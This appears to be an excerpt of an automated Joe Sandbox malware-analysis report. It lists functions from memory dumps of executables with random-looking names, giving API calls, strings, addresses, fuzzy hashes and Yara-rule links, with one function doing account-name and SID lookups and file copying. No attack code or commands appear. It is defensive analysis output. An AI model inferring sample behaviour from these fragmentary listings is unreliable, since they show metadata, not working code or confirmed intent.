[E] (%s) -> QueryDosDeviceW failed(gle=%lu), xrefs: 00007FF66EBA7EA2
%S%S, xrefs: 00007FF66EBA7F88

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: DeviceErrorLastQuery
String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
API String ID: 963133057-3473575966
Opcode ID: 514efc25f0c4eb172a5ba01c37f348038fb82fcf658263998647200fcf2634be
Instruction ID: 184a12214e35ed28f0599fbdbeb1d60822fd2c48392bf060c1ee02947b484c6f
Opcode Fuzzy Hash: 514efc25f0c4eb172a5ba01c37f348038fb82fcf658263998647200fcf2634be
Instruction Fuzzy Hash: 93419F12E4C5B6C3FE30661CE6803B95275DF6A754F150032F98E9F2CDDEADAD808289

Function 00007FF66EBACCD9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF66EBACD2A

Strings

%*.*s, xrefs: 00007FF66EBACD1A
%-*.*s, xrefs: 00007FF66EBACD23
%.*s, xrefs: 00007FF66EBACD37
%S%S, xrefs: 00007FF66EBACCDB

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fwprintf
String ID: %*.*s$%-*.*s$%.*s$%S%S
API String ID: 968622242-2451587232
Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
Instruction ID: ce0872a376569b2e9bc73c55c91d091e9b8ad23104b51d504ac75d01653473de
Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
Instruction Fuzzy Hash: F831B872F58503C7EB604E2D86045786AB0EF6EB94F04C131E95DEF699DD2CE8008F48

Function 00007FF66EBA193C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA1956
DeleteCriticalSection.KERNEL32 ref: 00007FF66EBA1983

Strings

Done, xrefs: 00007FF66EBA1994
debug_cleanup, xrefs: 00007FF66EBA199B
[I] (%s) -> %s, xrefs: 00007FF66EBA19A2

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: CriticalDeleteSectionfclose
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 3387974148-4247581856
Opcode ID: 0acbfdf3f8d6d1efa466a815d7992c440d0eef6fdb26f5ce6430468d6735f68e
Instruction ID: 881e3e0c74c691f9054f5fd95b34979a4ede53499f2688a1edfc2b6ca81c0967
Opcode Fuzzy Hash: 0acbfdf3f8d6d1efa466a815d7992c440d0eef6fdb26f5ce6430468d6735f68e
Instruction Fuzzy Hash: 4BF01760E49603C5FA849B58EAE43B52370AF7F704F880835E00DDE2A0CF3CA049CB48

Function 00007FF66EBAA96B Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00007FF66EBBA1E8,00000000,?,?,?,00007FF66EBBA1E0,00007FF66EBA1208,?,?,?,00007FF66EBA1313), ref: 00007FF66EBAABC2

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF66EBAAA62
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF66EBAAB5D
Unknown pseudo relocation bit size %d., xrefs: 00007FF66EBAAAEB

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
Instruction ID: 5f02b1710b516c98376b64fb3703f217a2cb46da572a50fa67bbcd07d4bbc526
Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
Instruction Fuzzy Hash: 06619061F58502C6EF208F19D78027823B1EB6EB94F048135EA1D8B7D9DE3DE581CB68

Function 00007FF66EBA19C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32 ref: 00007FF66EBA19DE
GetLastError.KERNEL32 ref: 00007FF66EBA19FB

Strings

[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FF66EBA1A0B
module_current, xrefs: 00007FF66EBA1A04

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: 81f36c89b860097b05460252ebfded9543c35cc1d90868fc212eea5c328d93e8
Instruction ID: 47546a2d0b32c6765622b1a464eb35d5a048f519108957aad576e7ce9bba287d
Opcode Fuzzy Hash: 81f36c89b860097b05460252ebfded9543c35cc1d90868fc212eea5c328d93e8
Instruction Fuzzy Hash: 2BF03064E08602D1EB709B58E5C03AA2774EB6A798F880135E54D8A6B4CE6CD24DC719

Function 00007FF66EBB0150 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF66EBB01CB
IsDBCSLeadByteEx.KERNEL32 ref: 00007FF66EBB01E6
MultiByteToWideChar.KERNEL32 ref: 00007FF66EBB023A
_errno.MSVCRT ref: 00007FF66EBB0244

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
Instruction ID: 0f0e024d3f3e107d15843bead8219fa96ba20b0d24438e78316d58a55f6b6587
Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
Instruction Fuzzy Hash: 1E318472E0C681C9E7744F21D7C03796AB0ABAA788F044135FA998B7D5EE7CD5498708

Function 00007FF66EBAAC27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF66EBAACE6
signal.MSVCRT ref: 00007FF66EBAACFB

Strings

CCG , xrefs: 00007FF66EBAAC46

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
Instruction ID: 7d662b7ac5a0db78fb038af22a2b9c9b506662f9f8c6212ea9771f9be07676bd
Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
Instruction Fuzzy Hash: A9218221E8D507C7FE6442188B9137911A2DF6F721F244935E98DCF2D1ED1CB8815A29

Function 00007FF66EBAA6D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF66EBAA78A

Strings

Unknown error, xrefs: 00007FF66EBAA6E7
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF66EBAA77D

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
Instruction ID: 05ce6182a68ca4a5224b1bfd9fa70964b5469b1b3385f698dfa64a71f72ddac7
Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
Instruction Fuzzy Hash: C4115162D08E84C2D6118F1CE0413EAB370FFAE359F605326FBC85A264DF3AD5568B04

Function 00007FF66EBAA710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF66EBAA78A

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF66EBAA710
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF66EBAA77D

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
Instruction ID: b43eda6e674750193cff056772be4b082ed1d416914597c20582f0dd81efec65
Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
Instruction Fuzzy Hash: 31F01266808F84C2D6118F1CE5402ABB370FFAF789F605326FBC96A624DF2DD5428B04

Function 00007FF66EBAA707 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF66EBAA78A

Strings

Argument domain error (DOMAIN), xrefs: 00007FF66EBAA707
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF66EBAA77D

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
Instruction ID: 967e24b58a7456a5e0f1b95247380947a9d9d0c9e5cf67276b2c328448d3f787
Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
Instruction Fuzzy Hash: F6F01266808F84C2D6118F1CE4402ABB374FFAF789F605326FBC96A664DF2DD5468704

Function 00007FF66EBAA722 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF66EBAA78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF66EBAA77D
Total loss of significance (TLOSS), xrefs: 00007FF66EBAA722

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
Instruction ID: caa382143d3361c4245e9e2b4896deaefaf3246335e93b10c8dbf7f9b27016b5
Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
Instruction Fuzzy Hash: F4F01266808F84C2D6118F1CE4402ABB370FFAF789F605326FBC96A664DF2DD5428704

Function 00007FF66EBAA719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF66EBAA78A

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF66EBAA719
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF66EBAA77D

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
Instruction ID: 4177d13d62f514cc4f0a7f4a4ecb46fed58e0070528291ba7addab7899fb0f4e
Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
Instruction Fuzzy Hash: DEF01266808F84C2D6118F1CE5402ABB370FFAF789F605326FBC96A624DF2DD5428B04

Function 00007FF66EBAA72B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF66EBAA78A

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF66EBAA72B
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF66EBAA77D

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
Instruction ID: 6346c167a6da0cafee369ccb1a08dbb498d25509d0665c2e6b85e0467c51741b
Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
Instruction Fuzzy Hash: 68F0FF66808F84C2D6118F18A4402ABB370FFAE789F605326FBC96A624DF2DD5428704

Function 00007FF66EBAA734 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF66EBAA78A

Strings

Argument singularity (SIGN), xrefs: 00007FF66EBAA734
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF66EBAA77D

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
Instruction ID: 7a9934c410feb340f5a857ab256ae43bb943c7fe2c7fb50d86a13eb3127c6b47
Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
Instruction Fuzzy Hash: A1F01D66808F84C2D2118F18E4402ABB370FFAE789F205326FFC86A628DF2DD5428704

Analysis Process: 31yd7ynpdj6jw5vl4xn9qyj7u.exePID: 3416, Parent PID: 5356COMMON

Executed Functions

Function 00007FF7A70C12FD Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2383560918.00007FF7A70C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7A70C0000, based on PE: true

Associated: 0000000B.00000002.2383547524.00007FF7A70C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2383577490.00007FF7A70D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2383577490.00007FF7A76CC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2384383201.00007FF7A7ADE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2384407138.00007FF7A7AE6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2384407138.00007FF7A7AE8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2384442556.00007FF7A7AE9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2384458896.00007FF7A7AEC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff7a70c0000_31yd7ynpdj6jw5vl4xn9qyj7u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
Instruction ID: b0a02467c6f3cb0f1f87f9b3e2142c9dc0e6805e1d94184d8e9555711fdafc5f
Opcode Fuzzy Hash: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
Instruction Fuzzy Hash: C4B012B0A06241C4E7003F15DC4125D76206B15700FC30030C80C03372CF7C54524B31

Analysis Process: main.exePID: 5252, Parent PID: 632COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	29

Executed Functions

Function 00007FFDA5576DA3 Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 332
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

LocalAlloc.KERNEL32 ref: 00007FFDA5576DD8
wcsncpy.MSVCRT ref: 00007FFDA5576E06
LookupAccountNameW.ADVAPI32 ref: 00007FFDA5576E63
GetLastError.KERNEL32 ref: 00007FFDA5576E75
GetLastError.KERNEL32 ref: 00007FFDA5576EBE
LocalAlloc.KERNEL32 ref: 00007FFDA5576EED
LookupAccountNameW.ADVAPI32 ref: 00007FFDA5576F29
LocalFree.KERNEL32 ref: 00007FFDA5576F36
GetLastError.KERNEL32 ref: 00007FFDA5576F41

Part of subcall function 00007FFDA55740D2: EnterCriticalSection.KERNEL32 ref: 00007FFDA55741A3
Part of subcall function 00007FFDA55740D2: LeaveCriticalSection.KERNEL32 ref: 00007FFDA55741CB
Part of subcall function 00007FFDA55740D2: CopyFileA.KERNEL32 ref: 00007FFDA5574228

GetProcessHeap.KERNEL32 ref: 00007FFDA5577234
HeapAlloc.KERNEL32 ref: 00007FFDA5577245

Strings

[E] (%s) -> ConvertSidToStringSid failed(gle=%lu), xrefs: 00007FFDA55770D1
sid_to_str, xrefs: 00007FFDA55770CA
D, xrefs: 00007FFDA5576DF5
users_sync, xrefs: 00007FFDA5576E80, 00007FFDA5576ECC, 00007FFDA5576F4C, 00007FFDA55770A9
